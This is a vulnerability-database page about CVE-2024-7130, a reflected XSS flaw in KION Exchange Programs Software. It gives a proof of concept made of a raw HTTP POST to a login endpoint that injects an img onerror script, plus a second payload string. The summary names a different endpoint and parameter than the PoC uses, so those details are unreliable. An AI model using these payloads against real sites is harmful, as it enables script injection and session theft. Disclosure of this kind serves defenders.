| Reporter | Title | Published | Views | Family All 8 |
|---|---|---|---|---|
| CVE-2024-7130 | 21 Nov 202414:15 | – | attackerkb | |
| KION Exchange Programs Software 跨站脚本漏洞 | 21 Nov 202400:00 | – | cnnvd | |
| CVE-2024-7130 | 21 Nov 202413:44 | – | cve | |
| CVE-2024-7130 Reflected XSS in Kion Computer's KION Exchange Programs Software | 21 Nov 202413:44 | – | cvelist | |
| EUVD-2024-48831 | 3 Oct 202520:07 | – | euvd | |
| CVE-2024-7130 | 21 Nov 202414:15 | – | nvd | |
| CVE-2024-7130 | 23 May 202506:43 | – | redhatcve | |
| CVE-2024-7130 Reflected XSS in Kion Computer's KION Exchange Programs Software | 21 Nov 202413:44 | – | vulnrichment |
# Exploit Title: Kion Exchange Programs Software Reflected XSS
# CVE: CVE-2024-7130
# PoC-Date: 2025-05-28
# Exploit Author: Kutay ERGEN
# Vendor Homepage: https://www.kionexchangeprograms.com
# Version: <= 1.21.9092.29966
# Tested on: Chrome 124, Firefox 125
# CVSS Score: 5.5 (Medium)
# CWE: CWE-79 - Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
# Educational Use Only: This PoC is published for academic research and testing purposes only. Unauthorized use is strictly prohibited.
## Vulnerability Summary:
The Kion Exchange Programs Software is affected by a Reflected Cross-Site Scripting (XSS) vulnerability in the programsearch.aspx endpoint. The searchtext query parameter fails to sanitize input, allowing attackers to inject arbitrary HTML/JS code.
## Proof of Concept:
POST /Account/Login.aspx?pId= HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
_CALLBACKID=<img src=x onerror=alert('XSS');>&_CALLBACKPARAM=c0:resetPassword
Payload:
#<img src=M onerror=alert(1);>Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation